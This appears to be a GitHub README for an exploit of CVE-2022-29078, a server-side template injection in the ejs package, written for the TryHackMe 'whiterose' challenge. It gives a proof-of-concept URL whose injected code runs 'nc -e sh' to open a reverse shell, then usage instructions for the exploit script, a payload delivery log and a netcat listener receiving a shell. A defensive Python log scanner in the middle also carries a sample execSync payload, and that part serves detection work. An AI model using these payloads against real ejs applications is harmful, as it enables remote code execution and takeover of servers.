Serverside Template Injection (SSTI) RCE - THM challenge "whiterose"

l0n3m4n/CVE-2022-29078

THM Challenge: SSTI RCE

whiterose

📜 Description

The ejs (Embedded JavaScript templates) package 3.1.6 for Node.js allows server-side template injection through settings[view options][outputFunctionName]. ejs parses this key as an internal option and overwrites the outputFunctionName option with an arbitrary OS command, which is executed when the template is compiled. The application is only exposed when it forwards client-controlled data (such as the parsed query string or request body) into its render call, so that a client can set view options at all; later ejs releases reject such values, and not passing raw request data into the renderer closes the path regardless of template engine version.

POC

http://localhost:3000/page?id=2&settings[view options][outputFunctionName]=x;process.mainModule.require('child_process').execSync('nc -e sh 127.0.0.1 1337');s
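Defender-side detection for the request pattern above, as an added example that is not part of this repository or the challenge: a scanner over constructed access-log lines that flags any client attempt to set ejs view options through the query string. The SAMPLE_LOG lines, the CODE_HINTS list and the severity rule are assumptions made for the example.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample lines in combined log format (assumption: the app logs
# the full request line). Not real traffic from the challenge box.
SAMPLE_LOG = """\
10.0.0.5 - - [06/Nov/2024:11:22:28 +0000] "GET /page?id=2 HTTP/1.1" 200 512 "-" "curl/8.0"
10.0.0.5 - - [06/Nov/2024:11:22:31 +0000] "GET /page?id=2&settings%5Bview%20options%5D%5BoutputFunctionName%5D=x%3Bprocess.mainModule.require(%27child_process%27).execSync(%27id%27)%3Bs HTTP/1.1" 200 512 "-" "python-requests/2.26.0"
10.0.0.9 - - [06/Nov/2024:11:40:02 +0000] "GET /search?settings[view+options][delimiter]=%24 HTTP/1.1" 200 88 "-" "Mozilla/5.0"
"""

REQUEST_LINE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# A client-supplied key of this shape reaches ejs's option parsing when the
# app forwards its query string into the render call; no legitimate client sends it.
VIEW_OPTION_KEY = re.compile(r"^settings\[view options\]\[(?P<opt>[^\]]+)\]$")
CODE_HINTS = ("process.", "require(", "child_process", "execSync", ";")


def inspect_query(query: str) -> list[dict]:
    """Return one finding per query parameter that tries to set an ejs view option."""
    findings = []
    # parse_qsl percent-decodes keys and values and turns '+' into a space, so
    # the encoded and literal spellings of the key normalise to the same string.
    for key, value in parse_qsl(query, keep_blank_values=True):
        match = VIEW_OPTION_KEY.match(key)
        if not match:
            continue
        opt = match.group("opt")
        code_like = any(hint in value for hint in CODE_HINTS)
        severity = "high" if opt == "outputFunctionName" or code_like else "medium"
        findings.append({"option": opt, "value": value, "severity": severity})
    return findings


def scan_log(text: str) -> list[dict]:
    """Scan access-log lines and return alerts for view-option injection attempts."""
    alerts = []
    for line in text.splitlines():
        match = REQUEST_LINE.search(line)
        if not match:
            continue
        target = match.group("target")
        for finding in inspect_query(urlsplit(target).query):
            alerts.append({"client": line.split()[0], "target": target, **finding})
    return alerts


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(f"[{alert['severity']}] {alert['client']} set {alert['option']}={alert['value']!r}")
```

Access logs only show the query string; the same keys can arrive in a POST body, so the same inspect_query check belongs on decoded request bodies as well.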

🛠️ Installation and Usage

$ git clone https://github.com/l0n3m4n/CVE-2022-29078.git
$ python3 -m venv venv && source venv/bin/activate && cd CVE-2022-29078
$ pip install colorama==0.4.6 && pip install requests==2.26.0 

$ python3 CVE-2022-29078.py -h

  _________ ____________________.___                      .__         .__  __   
 /   _____//   _____/\__    ___/|   | ____ ___  _________ |  |   ____ |__|/  |_ 
 \_____  \ \_____  \   |    |   |   |/ __ \|  \/  /\____ \|  |  /  _ \|  \   __|
 /        \/        \  |    |   |   \  ___/ >    < |  |_> >  |_(  <_> )  ||  |  
/_______  /_______  /  |____|   |___|\___  >__/\_ \|   __/|____/\____/|__||__|  
        \/        \/                     \/      \/|__|                                     
      Author: l0n3m4n | ID: CVE-2022-29078 | THM Challenges: Whiterose


usage: CVE-2022-29078.py [-h] -t TARGET -u USER -p PASSWORD

Send a crafted POST request with custom URL, username, and password.

options:
  -h, --help            show this help message and exit
  -t TARGET, --target TARGET
                        Target URL (e.g., http://admin.cyprusbank.thm/settings)
  -u USER, --user USER  Username to send in the request
  -p PASSWORD, --password PASSWORD
                        Password to send in the request

Example: python3 exploit-ssti.py -t http://admin.cyprusbank.thm/settings -u user1 -p pa$$w0rd 

Output

  _________ ____________________.___                      .__         .__  __   
 /   _____//   _____/\__    ___/|   | ____ ___  _________ |  |   ____ |__|/  |_ 
 \_____  \ \_____  \   |    |   |   |/ __ \|  \/  /\____ \|  |  /  _ \|  \   __|
 /        \/        \  |    |   |   \  ___/ >    < |  |_> >  |_(  <_> )  ||  |  
/_______  /_______  /  |____|   |___|\___  >__/\_ \|   __/|____/\____/|__||__|  
        \/        \/                     \/      \/|__|                                     
      Author: l0n3m4n | ID: CVE-2022-29078 | THM Challenges: Whiterose

[!] The exploit will automatically exit once we received a 504 from the server

Log

$ cat exploit-ssti.log
2024-11-06 11:22:28,919 - INFO - Payload delivered successfully.
2024-11-06 11:32:47,806 - INFO - Payload delivered successfully.
2024-11-06 11:32:58,284 - INFO - Payload delivered successfully.
2024-11-06 11:37:13,616 - INFO - Payload delivered successfully.
2024-11-06 11:55:16,861 - WARNING - Connection failed with status code: 504
2024-11-06 11:59:27,820 - WARNING - Connection failed with status code: 504

Netcat listener

$ sudo rlwrap -cAr nc -lvnp 443                                   
[sudo] password for l0n3m4n: 
listening on [any] 443 ...
connect to [10.2.4.61] from (UNKNOWN) [10.10.145.199] 38020
bash: cannot set terminal process group (1233): Inappropriate ioctl for device
bash: no job control in this shell
web@cyprusbank:~/app$ 
